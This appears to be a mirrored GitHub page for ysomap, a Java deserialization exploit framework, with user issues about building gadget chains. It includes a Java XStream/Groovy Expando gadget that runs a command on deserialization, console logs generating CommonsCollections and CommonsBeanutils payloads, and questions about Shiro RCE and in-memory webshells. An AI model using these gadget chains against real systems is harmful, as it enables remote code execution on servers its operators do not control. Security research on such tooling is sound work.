wh1t3p1g / ysomap Goto Github PK
View Code? Open in Web Editor NEWA helpful Java Deserialization exploit framework.
License: Apache License 2.0
A helpful Java Deserialization exploit framework.
License: Apache License 2.0
进行批量目标的漏洞验证或者利用, 当然, 爆破也是可以的.
Example:
java -jar ysomap.jar <exploit> [<payload>] [<bullets>] var1=vul1 var2=vul2 var3=vull3
我个人根据你的blog复现https://blog.0kami.cn/2020/04/18/java/talk-about-xstream-deserialization/ Groovy Expando这个方式的时候自己写的代码是这样的MethodClosure methodClosure=new MethodClosure("Calc.exe","execute");
Expando expando=new Expando();
expando.setProperty("hashCode",methodClosure);
HashMap map=new HashMap();
map.put("test",expando);
Field key=Class.forName("java.util.HashMap$Node").getDeclaredField("key");
key.setAccessible(true);
key.set(map,expando);
XStream xStream=new XStream();
String xml=xStream.toXML(map);
System.out.println(xml);
xStream.fromXML(xml);
我发现这个key是无法修改的因为是final类型,但是我发现如果put的时候直接放入expando对象的化会提前触发命令执行,这里我无法解决这个问题看了看你这个项目里的代码我不明白你的makemap 方法为何要如此处理
fastjson不出网 可以用BCEL执行命令回显,不是tomcat环境,怎么注入一个内存马
When using several of the Hessian deserialisation payloads against a hessian endpoint, the tomcat server responds with the following stack trace:
java.lang.ClassCastException: com.sun.org.apache.xpath.internal.objects.XString cannot be cast to java.lang.String
javax.naming.ldap.Rdn$RdnEntry.getValueComparable(Rdn.java:481)
javax.naming.ldap.Rdn$RdnEntry.compareTo(Rdn.java:444)
javax.naming.ldap.Rdn$RdnEntry.compareTo(Rdn.java:420)
java.util.TreeMap.put(TreeMap.java:568)
java.util.TreeSet.add(TreeSet.java:255)
com.caucho.hessian.io.CollectionDeserializer.readList(CollectionDeserializer.java:78)
com.caucho.hessian.io.SerializerFactory.readList(SerializerFactory.java:341)
com.caucho.hessian.io.Hessian2Input.readObject(Hessian2Input.java:1945)
com.caucho.hessian.server.HessianSkeleton.invoke(HessianSkeleton.java:131)
com.caucho.hessian.server.HessianSkeleton.invoke(HessianSkeleton.java:109)
com.caucho.hessian.server.HessianServlet.service(HessianServlet.java:396)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
ysomap > use payload CommonsCollections3
You can choose bullets: [TransformerBullet, TransformerWithJNDIBullet, TransformerWithSleepBullet, TransformerWithURLClassLoaderBullet, TransformerWithFileWriteBullet]
ysomap payload(CommonsCollections3) > use bullet TransformerBullet
ysomap payload(CommonsCollections3) bullet(TransformerBullet) > set command whoami
ysomap payload(CommonsCollections3) bullet(TransformerBullet) > run
[+] generate CommonsCollections3 success, plz seepayload.CommonsCollections3.TransformerBullet.ser
[+] generate payload(CommonsCollections3) started!
Bullet Type Not Match; Error TYPE: class [Lorg.apache.commons.collections.Transformer;
使用TransformerWithSleepBullet 和 TransformerBullet 都是提示错误 “Bullet Type Not Match”
My account was compromised, as a result many spam issues got created across multiple repos. I am deleting all such issues. Please check my tweet: https://x.com/arghyac35/status/1729721954909684064?s=20
生成ser的过程也没有填key(⊙o⊙)?
应该怎么操作呢。
一阵子有点想不过来0.0
ReflectionHelper.newInstance("javax.swing.MultiUIDefaults", new Object[0]);执行错误,貌似改函数仅能获取第一个构造函数的。
ysomap-master/core/src/main/java/ysomap/exploits/shiro/ShiroRCE1.java中150行附近
byte[] keyBytes = Strings.base64(key.getBytes());
应该是将key字符串byte后进行base64解码,而单调用的ysomap-master/common/src/main/java/ysomap/common/util/Strings.java中59行附近是base64编码。
public static byte[] base64(byte[] data){
Base64 base64 = new Base64();
return base64.encode(data);
}
导致该ShiroRCE1 exploit失效。
ysomap payload(CommonsBeanutils1) bullet(ProcessBuilderBullet) > run
[+] generate payload(CommonsBeanutils1) started!
[+] generate payload(CommonsBeanutils1) done!
[+] generate CommonsBeanutils1 success, plz see obj.ser
java.io.NotSerializableException: java.lang.ProcessBuilder
at java.io.ObjectOutputStream.writeObject0(Unknown Source)
at java.io.ObjectOutputStream.writeObject(Unknown Source)
at java.util.PriorityQueue.writeObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeWriteObject(Unknown Source)
at java.io.ObjectOutputStream.writeSerialData(Unknown Source)
at java.io.ObjectOutputStream.writeOrdinaryObject(Unknown Source)
at java.io.ObjectOutputStream.writeObject0(Unknown Source)
at java.io.ObjectOutputStream.writeObject(Unknown Source)
at ysomap.core.serializer.DefaultSerializer.serialize(DefaultSerializer.java:25)
at ysomap.core.serializer.SerializerFactory.serialize(SerializerFactory.java:52)
at ysomap.cli.Session.run(Session.java:213)
at ysomap.cli.Console.dispatch(Console.java:127)
at ysomap.cli.Console.run(Console.java:77)
at ysomap.cli.App.main(App.java:17)
ysomap payload(CommonsBeanutils1) bullet(ProcessBuilderBullet) > show options
我的同学在 Mac 上面没编译成功,但是在我的 Win 上面成功了,jar 包拷过去也可以正常使用
开发者大大不如下次直接在 Release 标签里面放一个编译好的 jar 包?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.